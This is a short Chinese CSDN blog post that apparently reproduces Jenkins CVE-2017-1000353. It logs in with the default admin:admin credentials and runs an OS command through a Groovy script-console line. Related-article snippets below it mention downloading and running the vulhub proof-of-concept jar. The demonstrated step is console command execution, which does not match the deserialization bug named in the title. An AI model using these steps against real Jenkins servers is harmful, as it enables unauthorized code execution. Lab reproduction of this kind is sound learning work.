jenkins 代码执行 (CVE-2017-1000353)漏洞复现

已于 2024-04-03 09:45:36 修改
阅读量547 收藏
点赞数
文章标签: jenkins 运维
于 2022-09-23 11:31:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/127005704
版权

1.漏洞描述

        Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。

2.打开界面

admin:admin登录

6cf79b80337c494a947f062529076272.png

 

3.执行代码即可

println "ls /tmp".execute().text

02ef6777849b41888584a7f4d93b9cda.png

 

 

weixin_42675091
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins-CI 远程代码执行漏洞复现CVE-2017-1000353
墨痕诉清风的博客
11-06 824
(https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar),这是生成POC的工具。下载[exploit.py](https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py)参考阅读 https://blogs.securiteam.com/index.php/archives/3171。.
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
锋刃科技的博客
06-18 654
环境搭建 使用vulhub和docker搭建环境 cd /vulhub/jenkins/CVE-2017-1000353 docker-compose up -d 访问http://your-ip:8080即可看到jenkins已成功运行 漏洞复现 wget https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar 获取CVE-2017-1
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4494
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
【护网必备】Jenkins综合漏洞的利用工具
最新发布
Fly_鹏程万里
05-31 362
CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1。CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897。本开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。
jenkins java反序列化_Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 199
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
Jenkins部署
DaySurprise的博客
10-15 496
一. jenkins部署环境(目前指的是我部署成功过的环境) Linux : centos7 tomcat : tomcat8 tomcat开机自启动设置可以查看我的另一篇博客(https://blog.csdn.net/DaySurprise/article/details/102502408) jdk : 1.8 二. jenkins下载 下载地...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
Jenkins-PreAuth-RCE 漏洞详解】 Jenkins 是一款广泛应用的持续集成工具,用于自动化各种软件构建、测试和部署任务。在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000...
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)1
08-04
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)Jenkins Git client插件命令执行漏洞(CVE-2019-10
jenkins-update-center:詹金斯镜像更新中心生成器
02-21
詹金斯更新中心 詹金斯镜更新中心生成器 更新时间 每天凌晨1点UTC更新 镜像站点 腾讯 华为 清华 ustc 位 文件update-center.json ...wget https://cdn.jsdelivr.net/gh/lework/jenkins-update-center/rootC
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
WY92139010的博客
08-05 641
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353) 一、漏洞描述 该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。 二、漏洞影响版本 所有jenkins主版本均受到影响(包括<=2.56版本) 所有的jenkins...
[CVE-2017-1000353]Jenkins-CI 远程代码执行漏洞
https://www.cnblogs.com/zpchcbd/
09-21 482
vulhub环境搭建: cd /root/vulhub/jenkins/CVE-2017-1000353 docker-compose up -d 访问网址 http://120.79.66.58:8080/ 漏洞复现: 1、先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar来生成相应利用的poc java -jar CVE-2017-1000353-1.1-S...
利用Vulnhub复现漏洞 - Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
JiangBuLiu的博客
07-11 2251
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现生成序列化字符串发送数据包,执行命令检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/ 漏洞原理 参考阅读 https://blogs.securiteam.com/...
使用jenkins工具定时执行脚本方法
kangkai0209的博客
11-23 1万+
jenkins是基于Java开发的一种持续集成工具,用于监控重复执行的工作,所以在自动化测试中也能用于定时执行脚本 我在这里介绍怎样搭建环境,和使用jenkins定时执行cmd命令 一、环境搭建 1、首先要下载两个安装包,tomcat和jenkins包: 下载地址: jenkins下载地址:http://jenkins-ci.org 选择LTS(长期支持的版本)和适合自己电脑系统的版本 tom...
java反序列化漏洞实战
weixin_34009794的博客
04-01 675
准备: 域名一个,用于增加NS解析,判断是否存在反序列化漏洞。 公网IP服务器一台,用于搭建DNS代理,抓包判断。 dnschef,DNS代理 ysoserial.jar生成payload. 简单的python脚本,调用ysoserial.jar并发送payload 首先域名增加一条A记录解析到公网IP服务,然后增加一条NS记录指向这条A记录。 然后公网IP服务器 开...
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
Java反序列化漏洞分析
abg49988的博客
10-15 1386
相关学习资料   http://www.freebuf.com/vuls/90840.html   https://security.tencent.com/index.php/blog/msg/97   http://www.tuicool.com/articles/ZvMbIne   http://www.freebuf.com/vuls/86566.html  ...
漏洞复现Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_41438728的博客
11-17 251
转载来源:https://blog.csdn.net/weixin_45556536/article/details/109677547
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
攻击者可以利用该漏洞Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞的利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值